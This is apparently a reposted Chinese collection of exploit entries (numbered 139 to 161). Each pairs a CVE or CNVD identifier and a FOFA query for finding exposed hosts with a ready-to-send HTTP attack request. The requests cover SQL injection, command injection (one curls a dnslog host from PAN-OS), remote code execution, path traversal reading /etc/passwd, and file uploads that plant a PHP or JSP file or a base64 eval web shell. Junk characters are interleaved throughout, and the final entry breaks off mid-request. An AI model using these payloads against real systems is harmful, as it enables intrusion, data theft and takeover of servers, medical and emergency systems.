3 k9 C: a( w$ o- \' t0 k* f$ [- T: VUpgrade-Insecure-Requests: 18 _! X9 u+ R' U
, e9 T' N& H% M+ b5 h) A3 ^
3 [- P, A: }: |& V6 ?
139. 福建科立讯通信指挥调度平台editemedia.php sql注入' A2 S8 K: j: b2 k/ Z
CVE-2024-2622, I/ }1 j# m2 u3 S5 Y( b
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"7 ~5 f# g# i D
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
! P. s' H( ~: c- {8 P( x7 |Host: x.x.x.x
: I7 `% u. G" x3 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0, W+ c+ q n; i$ W! N' p$ g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 C0 p# Z. F, p/ E0 W, f9 t" z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 ?- i8 e; I8 VAccept-Encoding: gzip, deflate, br
$ b) w9 \: u% n( a3 Y9 q( _Connection: close( C! h V9 g7 M V+ g2 H
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
1 U/ J) c* e0 b% SUpgrade-Insecure-Requests: 1
( Q6 o W" J' l+ ~7 X! \- S, Q+ w
# d& Y8 Q' H4 [, l0 z/ f2 Q: y w4 d* P8 }) k. {/ ]
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
' I6 Q X7 T3 g8 \9 bCVE-2024-2566
* m6 h! c* r0 x2 Q0 f7 BFOFA:body="app/structure/departments.php" || app="指挥调度管理平台") [4 y" p, |5 s% _# \1 s M8 K
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1" Z% M! u' A5 t- S
Host: x.x.x.x9 ~7 e3 s9 \/ V v4 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
9 f6 ]+ |, X* J. |( o: ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" N" H I/ Q3 X0 p; @4 t: ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 J8 F0 f% Z6 @
Accept-Encoding: gzip, deflate, br/ N2 {! T) R, s+ d8 c. l4 P
Connection: close
' u7 A+ O; ~) J+ f) |* J2 ACookie: authcode=h8g9 _7 Y# I8 R' h3 e6 O% X2 g
Upgrade-Insecure-Requests: 1
3 q3 `7 M& H7 a4 Q% \# [4 O, s" C/ P; C0 e3 _; _
' e7 e+ k9 h7 G8 } {$ l
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
8 W7 a; Z) I0 N4 c9 ?FOFA:body="指挥调度管理平台"
: u. P0 q6 [- U1 gPOST /app/ext/ajax_users.php HTTP/1.1
) {/ [& y6 a" Z8 m* EHost: your-ip# H2 o9 Y' s6 S3 j' n
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
! M+ o# e2 C s+ UContent-Type: application/x-www-form-urlencoded
1 N% c! l, H+ l) d6 C" T I/ k2 u. S0 L, A w; {, K
( a% U7 s3 _7 D6 X# tdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -, X5 W, t( \" ~2 F% d t6 a$ N
3 {/ `% ^, B0 b, g. x& I& a# D1 `9 j) I* E& }3 ?# r) Y: R
142. CMSV6车辆监控平台系统中存在弱密码
* n# w( e! u% Y% R+ E DCVE-2024-29666, y& @+ e$ w, R7 }" L3 P& \
FOFA:body="/808gps/"/ m; _- l' f3 i
admin/admin
; R) @& P; O( A9 l K0 d' o143. Netis WF2780 v2.1.40144 远程命令执行
- }3 I' Y& C) ]: zCVE-2024-25850
9 F6 N: r( P* _8 @: K% QFOFA:title='AP setup' && header='netis'" S- [: s. G8 s, @0 R: ^; ]
PAYLOAD$ z9 A* v. y: Q3 e2 j
% R$ J# @8 g' a4 i- s/ ?
144. D-Link nas_sharing.cgi 命令注入- `( F+ z1 e/ Y$ G
FOFA:app="D_Link-DNS-ShareCenter"
, g# T) P$ ?% U3 t. o' Hsystem参数用于传要执行的命令
1 o# K" B" g9 T# ^* S, xGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
3 k2 O4 C g: P! @Host: x.x.x.x; u0 p5 y+ g# |/ c& {1 l) c
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
, x- s6 r3 L6 Z3 @ b$ l( c* D1 AConnection: close. r2 m3 g3 U( V2 n
Accept: */*
& P: ~1 s- d" D& v4 \! B6 QAccept-Language: en
8 i3 b; N' D+ R4 |: Y* |Accept-Encoding: gzip- S/ }, S) b& `' I! j' V2 [
# n9 _" q, u7 }# p, }
/ f) b- O) F6 S6 z3 l3 V9 t! f145. Palo Alto Networks PAN-OS GlobalProtect 命令注入- a1 B. F6 M7 Y' N6 Q% y3 G1 B$ C. H! r
CVE-2024-3400
9 T5 v, ~8 s' q/ {$ ~' C5 s9 l ]FOFA:icon_hash="-631559155"
4 S5 [' i8 t. n4 i/ @& N3 JGET /global-protect/login.esp HTTP/1.1" Y# F8 H2 s @$ v
Host: 192.168.30.112:1005
4 H) l7 ~/ O/ L' t+ S+ U8 p. b0 [% dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84. q$ o* r6 K& r
Connection: close
/ Z M' e8 u' G) C$ k2 T5 ^" \Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`; t3 b4 ^: }" R7 g4 r" U8 p& E3 o
Accept-Encoding: gzip8 M! A) f# C8 N3 H' k" l
% X4 p8 _+ p T! X# k
3 p8 p) g( B: P8 _8 i# S2 p146. MajorDoMo thumb.php 未授权远程代码执行
3 I) j! h3 l2 l' z- x D1 @CNVD-2024-02175
1 w) E c6 \+ ?) wFOFA:app="MajordomoSL"6 H. g. ^. l5 L
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
0 t- K) ~8 m1 UHost: x.x.x.x8 o9 p6 b+ i& V1 T* w9 s0 _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84; u: _* O& `, B& Z1 l
Accept-Charset: utf-86 ^( d5 H8 ]5 p V3 k4 s/ v5 c
Accept-Encoding: gzip, deflate
* n/ J- {! J* o/ K, aConnection: close
) J% |$ _0 q/ Q3 h+ i5 t9 _7 j5 U* H+ N7 Y" [1 c5 X$ W- O
) g# J6 A$ H% k$ `7 v; S147. RaidenMAILD邮件服务器v.4.9.4-路径遍历$ s7 l* \% S; L! |5 g
CVE-2024-323990 I& J3 ?' `! ^. o+ ^* [; R$ H9 @: b
FOFA:body="RaidenMAILD"4 |/ D6 k; I J6 M: s& q) A$ Q
GET /webeditor/../../../windows/win.ini HTTP/1.1
- S! O% K3 r+ d5 z$ R5 e; g6 b$ S6 zHost: 127.0.0.1:81
( |8 m& }1 \+ t* ~. O- {1 ]Cache-Control: max-age=0
6 O( }# q- O0 N5 ~' x" ?Connection: close3 S- d# X6 K9 {6 d
4 d. C/ J$ T0 W' a3 u; A
: W1 A" H9 t2 j% Q1 ?. j148. CrushFTP 认证绕过模板注入/ n1 `! c8 ?( q5 q$ C4 \
CVE-2024-40402 w C; _0 M& k D
FOFA:body="CrushFTP"- E5 o0 S$ m- _4 U& x; u$ n) X
PAYLOAD
. {9 F& r) M7 N' y9 G* B% [& y/ A+ h, Y9 Y; {9 B
149. AJ-Report开源数据大屏存在远程命令执行* G7 p) L& J+ T2 J& s
FOFA:title="AJ-Report"
& }0 q! n" i5 x6 x; f5 q
( U( Q3 F6 n* I4 u9 j+ B6 }7 n5 k/ YPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1$ f4 Q+ p/ U# Q$ h2 T
Host: x.x.x.x, z; T. U) K P3 @# q, Q e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.363 i) S6 m& ~7 V8 E# ^2 u# u6 ^2 m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% h* R u3 L2 N- B8 O* H; u
Accept-Encoding: gzip, deflate, br% {3 C. T2 ^4 K8 j; a' g
Accept-Language: zh-CN,zh;q=0.9$ v' V& a* o0 x( X- h6 j& O! v' `
Content-Type: application/json;charset=UTF-8
4 E& r+ M9 i% J4 v: [6 `Connection: close. H" O2 d: p3 d4 q( }) B& E" K
/ v! r5 z& Z7 ^: A, t3 {( ?{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
, }' @5 U( F" S# f/ R9 c7 W# U2 W# l6 o/ R. o2 f( g
150. AJ-Report 1.4.0 认证绕过与远程代码执行$ p" T9 _% m$ H$ l
FOFA:title="AJ-Report"
' V' W9 }- S+ HPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
% @% P4 M0 w% o3 e3 k* Y' GHost: x.x.x.x
& {, Y9 x$ U4 J! @! E7 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
1 n+ D& Y' C eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! A: b! G* @5 OAccept-Encoding: gzip, deflate, br8 K2 d: g, Z" V6 ~ l
Accept-Language: zh-CN,zh;q=0.9
6 `+ y. S1 Z0 B) m/ g4 kContent-Type: application/json;charset=UTF-80 s9 J- u# Y9 I; W
Connection: close) _( K; z# _; m
Content-Length: 339
2 O" d5 M+ f4 G
* A. ?/ l+ O2 U" _7 U+ J{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
1 |% n: b! l+ h1 v0 T) a' Z
7 D s' }7 X5 D3 A, Z$ b4 L$ G4 P8 t* Y8 Q
151. AJ-Report 1.4.1 pageList sql注入
. O! U! C- k% O; TFOFA:title="AJ-Report"
, ? f* G& s9 x- i/ eGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.14 [2 _6 {4 D* B2 ~* ?7 l6 L, W
Host: x.x.x.x
% z1 ]$ g. n0 i8 HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 K# ?; t* l) U. A% q3 vConnection: close
v* y0 W2 C4 q7 `6 z5 [" TAccept-Encoding: gzip
/ J* z1 q0 q: g+ h- _) M( n8 h8 I* n- J r
, w: e6 t$ m, Z% k, o. Y7 G8 i- v* g152. Progress Kemp LoadMaster 远程命令执行
: W. \+ q, N# l: S) DCVE-2024-1212
! K8 _, a9 g, l x. fLoadMaster <= 7.2.59.2 (GA)
8 r( b w' j8 L R/ ~% uLoadMaster<=7.2.54.8 (LTSF)" E) S* a' x: O
LoadMaster <= 7.2.48.10 (LTS)
' f6 @+ o) L2 EFOFA:body="LoadMaster"
: U4 p. Q7 X' @JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
/ H$ x; L6 r7 X1 S7 m) b7 _GET /access/set?param=enableapi&value=1 HTTP/1.1
! C" |" c3 Q: ~Host: x.x.x.x
. W; u3 f8 r5 ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
# d7 w* `- G& N- A, S5 [2 ~Connection: close" c& ]" ~! D' u- @
Accept: */*
# b- R* R* ~. v/ @4 FAccept-Language: en& s6 y$ B7 `% [# q. v' l U1 h
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=) c# R+ q2 f0 }1 z
Accept-Encoding: gzip
8 u" ^1 S# S5 \ `# q7 w- l# R# I' p7 Q
$ }% G7 ?" |; M; C2 K153. gradio任意文件读取0 ~( W7 o( r" ~: i* H
CVE-2024-1561FOFA:body="__gradio_mode__"+ V3 M( G3 a4 a7 a
第一步,请求/config文件获取componets的id
. z1 W( {' n5 ^0 k/ ^* b0 H0 ghttp://x.x.x.x/config, j4 T3 a2 i* \' L8 j
8 G, c- H& M$ u
3 K; p; I9 Y! _- C4 l" b- ~ F
第二步,将/etc/passwd的内容写入到一个临时文件, t" l i7 L$ ~4 _# f. g
POST /component_server HTTP/1.1
/ L5 [; ]2 z& I% e" }$ i& s3 C- xHost: x.x.x.x1 g9 I. ^; i7 [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3! p# V, S( ], A0 G% L
Connection: close; b! M3 G' O1 w$ q& j
Content-Length: 115
* n& p* T6 W* N" zContent-Type: application/json
$ J. A' Y- t& qAccept-Encoding: gzip k( e3 z, T& K2 n/ b; B2 R
- A @) R4 p" M{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}- R% Z G+ ^" n6 P* w: {+ C2 |4 k9 O
$ g2 q, B7 r; ^ b/ L/ m0 |7 R
; X8 h4 }6 |' C' N" F6 V- p第三步访问
) S/ F% Y( p* `# T- whttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
' H5 A5 d% [+ ?. j: _3 N' V( }
1 s" p, f* r$ v8 [, A0 `154. 天维尔消防救援作战调度平台 SQL注入
; o- G w5 P5 m) GCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"7 j2 H! q6 Q2 C
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
" e1 l$ U5 D/ F0 ~1 R- H0 lHost: x.x.x.x' e/ }1 Z% q2 J8 |
Content-Length: 106
0 c! T( h8 f3 e- q0 C8 U5 gCache-Control: max-age=04 r+ l4 X# h+ f4 ^3 Q
Upgrade-Insecure-Requests: 1
8 y) I0 t7 s2 @) `+ \$ C& W9 xOrigin: http://x.x.x.x Y1 U* i x& i- T& W- Z
Content-Type: application/json
# M f0 \# ?4 E- XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
8 [ U& A' c- zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' m$ T9 X$ P' y0 a1 u: N% y0 oReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page0 S @2 W- y/ P7 F
Accept-Encoding: gzip, deflate1 ` ~& i% O F: |; I
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7* J2 v: k$ l, u- r
Connection: close7 y; I& h+ c2 u; t$ F
5 H$ f$ s' \; {: r F' `
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}2 T1 {. `0 W2 B/ t+ h
' Z" O, _' m1 r
% c% E* F- J: p5 N; A9 j5 G' @
155. 六零导航页 file.php 任意文件上传 e$ ]3 B% ~: i" z8 q4 A% O# |# b
CVE-2024-34982
) p: O+ U% ]+ W: @5 dFOFA:title=="上网导航 - LyLme Spage"
y5 F. U4 g0 k9 Q; UPOST /include/file.php HTTP/1.1
- n% {) ~) F. C9 sHost: x.x.x.x. i$ E; |. k2 @2 I' ^! j$ }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.07 u) c2 S" H! k) j( s2 D2 ]
Connection: close
; V- ?8 F& H% x$ o' X/ }- q9 x1 wContent-Length: 232
! s* O$ x" J, E2 v) _Accept: application/json, text/javascript, */*; q=0.01: E g; x; V3 O/ c9 E! k, _& C
Accept-Encoding: gzip, deflate, br6 [/ z, d/ G& `; S8 Y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& B7 n, D( n3 ~0 e' E9 M2 M' K
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
! L3 W: p+ a1 o- T6 TX-Requested-With: XMLHttpRequest
" \" L1 M' m. ]; g' ^1 {* K! D
0 _+ C7 C) i8 B& {-----------------------------qttl7vemrsold314zg0f
3 G, T1 R; A9 G9 U- eContent-Disposition: form-data; name="file"; filename="test.php"
: v# E3 F3 G% u: G5 I ~Content-Type: image/png
6 B8 h" x% \% v N9 ]( B9 g
) ^$ ]: L$ h0 i2 O/ `<?php phpinfo();unlink(__FILE__);?>6 p+ @7 j8 Z, l7 Z; L: N
-----------------------------qttl7vemrsold314zg0f--4 i8 B% i% D4 C% K( s' v" C) s
5 R7 {9 B% |* a+ |
5 o* g, m( ?( Q) A( g& ~3 V访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
2 O \) M8 X0 p/ p" A3 X" w4 A8 }9 R
156. TBK DVR-4104/DVR-4216 操作系统命令注入
$ x% b: V8 Z9 l3 h g l! RCVE-2024-3721' M4 P) z" E$ a. G {4 x) F) V
FOFA:"Location: /login.rsp"
0 }( }. ]# I' ~' g! u$ r1 p& I·TBK DVR-4104
, \: E5 B, `* R- X0 Z/ {·TBK DVR-4216
+ q! M4 ?' }( E; V" }. t7 lcurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
+ I3 g* |: A! L4 h& Y6 c9 G' ]+ ]: K6 _" W: k8 j
6 R, d0 M& S5 R. H
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
; J& U/ |3 @0 u( B) oHost: x.x.x.x
& U+ K& l w. w3 xUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- v( n2 @% _; [! v& k) b6 d
Connection: close
1 d: d8 t, U- r6 q2 h& MContent-Length: 0
/ |+ T8 h$ D& l9 xCookie: uid=19 F2 ` r: p) N# ~2 U9 f' Q
Accept-Encoding: gzip3 K3 q" N5 }8 E- X. D
) s. `+ q4 _% {$ P" Y# y
' @9 _- Y* d" s3 N9 z j157. 美特CRM upload.jsp 任意文件上传
; @$ {! ?$ p) O4 Q; RCNVD-2023-06971; K0 S2 a6 H+ v7 W8 j0 ?$ b
FOFA:body="/common/scripts/basic.js"
) F* I% V! A+ e$ Z/ p7 l3 lPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
: b+ V3 R/ U: vHost: x.x.x.x( {% t$ R6 x' ?- m0 {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
2 l) R& P7 B uContent-Length: 709; a2 |- J2 H3 p) x: I3 t l: t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! l/ d/ `, ~3 }' p. A; BAccept-Encoding: gzip, deflate* H4 x, s0 f6 i& p
Accept-Language: zh-CN,zh;q=0.9
6 e* e8 ~# a \1 [& ECache-Control: max-age=0
) j5 ?9 W( G( @Connection: close
; L2 r$ l3 o! Q; Z5 T8 X5 Y. p" IContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
! Z. t- j4 H6 C$ |" O5 O2 \8 f8 mUpgrade-Insecure-Requests: 1
0 I) Y' _+ b/ ^: o1 X& g, N" `* Z% b/ U8 k% I0 G" }% g& Z
------WebKitFormBoundary1imovELzPsfzp5dN
9 S; a" o5 `& s F" S: t# D/ z, w! iContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
. Z, t4 k L9 Q5 F |: D" @& G5 pContent-Type: application/octet-stream
; C5 a: l! O; W, L' ]" W; L% P8 \5 e
nyhelxrutzwhrsvsrafb
* d1 J# }' t% A------WebKitFormBoundary1imovELzPsfzp5dN
1 o, F" l: W& L' c% }Content-Disposition: form-data; name="key"* ~0 j% t' @9 R
# U9 _# c }, B0 Snull# f+ h+ ^: n0 w
------WebKitFormBoundary1imovELzPsfzp5dN9 {$ X/ Z% s. h. }$ G' I+ g
Content-Disposition: form-data; name="form"$ `% } h9 e. P: g: Q
2 Y8 a- \( [4 b; E4 U" l* Lnull
- s1 V* n' y$ g4 A" W5 y4 C------WebKitFormBoundary1imovELzPsfzp5dN$ |- H, I3 W' Y& s
Content-Disposition: form-data; name="field"
- {% ]. i5 |6 B$ I1 L$ M. B, y! K' m0 h8 b% o1 P7 O; I; D' a5 L
null
' I/ |0 _; t* F* `2 m/ `. `------WebKitFormBoundary1imovELzPsfzp5dN
% O4 m5 C* U/ f- |. ZContent-Disposition: form-data; name="filetitile"
u& x" K2 S: t c
* m9 ~- b1 ?: ~" s; _null5 D$ P; F7 D5 g: {/ V* h
------WebKitFormBoundary1imovELzPsfzp5dN
, H& A d; t7 {/ D, c+ bContent-Disposition: form-data; name="filefolder"
) B5 U; M( G- ^* K& U
4 O5 _1 ]9 [1 ~" q/ |/ Inull x+ {& g9 q! s- S# D2 _5 l
------WebKitFormBoundary1imovELzPsfzp5dN--
% t' ]* ?. T0 }4 C) [; Y7 N# X; p6 M. Z* r
6 N+ K- @' U( G# C3 w+ ~: ]http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
5 \4 c; q7 R. I4 P5 X( T" Q' v3 K1 O: S: B+ r- T$ n
158. Mura-CMS-processAsyncObject存在SQL注入% f8 v* Z! T, o) {2 w
CVE-2024-32640( z" }1 |* k/ [( r) T
FOFA:"Generator: Masa CMS"8 c: G; i' X" U
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1. H, X! z; M5 l6 x
Host: {{Hostname}}
. O& s$ a" y9 ~$ v. hContent-Type: application/x-www-form-urlencoded" `! o7 e. S/ [3 C3 |/ b3 r3 v
" e$ o8 f' z! | o, Q% _/ J+ |6 u/ Z- s. Pobject=displayregion&contenthistid=x\'&previewid=1
8 X5 Q7 t. X6 V, ~
& |/ {2 v9 l2 G" F; v [; K: G: x
- P' U8 g5 _' G" |159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
* X& K7 c& T7 UFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")0 D" P/ f- J7 c1 l, w# _
POST /webservices/WebJobUpload.asmx HTTP/1.1; O7 k' g- L- `1 g$ s
Host: x.x.x.x2 ~4 p( e k/ A( y) D- p# `% I4 q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36. D4 \" ^& e: f& I0 M/ B
Content-Length: 1080$ u3 ]4 V2 d/ t0 E% _
Accept-Encoding: gzip, deflate* s! b+ @9 M$ H; h% T
Connection: close
( p+ w7 e5 q/ g( k8 z" tContent-Type: text/xml; charset=utf-83 u$ f2 d8 T; b8 ?8 e
Soapaction: "http://rainier/jobUpload"' n/ j1 J# ?" ~% H! ~: |, p# m$ e
1 X1 M# g8 s$ J0 H8 r Q5 I# B6 J
<?xml version="1.0" encoding="utf-8"?>
) S) _" J8 @) {# |1 F: x' C<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
* C) v/ I) ~$ P<soap:Body>8 ^# b# b ~ `* |) \. L
<jobUpload xmlns="http://rainier">8 v* S7 _: Q+ H2 R D9 R
<vcode>1</vcode>5 U1 r3 X& m3 t. h/ Q
<subFolder></subFolder># \. h, s& d6 e( m4 M( O/ I
<fileName>abcrce.asmx</fileName>( x3 |* J6 Q( ~0 e& e! P
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
4 x7 A" M8 m6 F- ]</jobUpload>
/ b: ~ j2 }4 [& j</soap:Body>/ P S+ v+ s/ M' y' n2 v( p
</soap:Envelope>0 J* K& }- x, O
1 F& d# M% Y% s- z
6 A: t t( X) w: u7 J/ |* @
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
" }/ Z0 {. P8 X4 E& E
! y3 y' G* f2 z! W6 R
2 ]( ^0 q" A2 J. a* m160. Sonatype Nexus Repository 3目录遍历与文件读取1 @, j2 T/ O* s& ~5 U
CVE-2024-49561 k9 I7 {4 c2 l
FOFA:title="Nexus Repository Manager"# u4 K( p- b+ H# {/ G
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1/ C$ W2 [- |- }0 H2 G" B% I
Host: x.x.x.x
, Q$ f6 R3 f. f7 s' T; x7 uUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
. G8 M2 S7 w4 k. f/ KConnection: close% @* W( n( l l) S( H/ f
Accept: */*/ C) x1 g- K2 y: Q6 X" _8 S
Accept-Language: en2 o4 D% P% g+ V3 N
Accept-Encoding: gzip
2 Q: g; Q+ k8 c2 B* n0 S0 a) N( X h& u3 Q. k8 r
; U( q, q( ]4 d5 l( a161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传8 ?5 \, f$ S6 t, c
FOFA:body="/KT_Css/qd_defaul.css"
, \2 @) j6 A: E X" w8 R0 l第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
$ C* t: c$ }) o0 r- ZPOST /Webservice.asmx HTTP/1.1& e7 G& X2 N; U
Host: x.x.x.x8 Z8 V% J0 e! L& h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
# G7 r6 v8 l! X+ U' }Connection: close8 g# D# A/ A: S# m
Content-Length: 445) L# h; r8 n- i& j6 q& C0 Q
Content-Type: text/xml
4 j* S& ~7 m& Q0 sAccept-Encoding: gzip* f0 V V. p8 u
- e2 i# ]/ _' N. T. u9 f8 j
<?xml version="1.0" encoding="utf-8"?>' H0 a# h' y; W% U) q) U3 a
<soap:Envelope xmlns:xsi="! m3 K2 b. S& J3 a- I' X& t
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema", z1 s q2 _( w. z
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
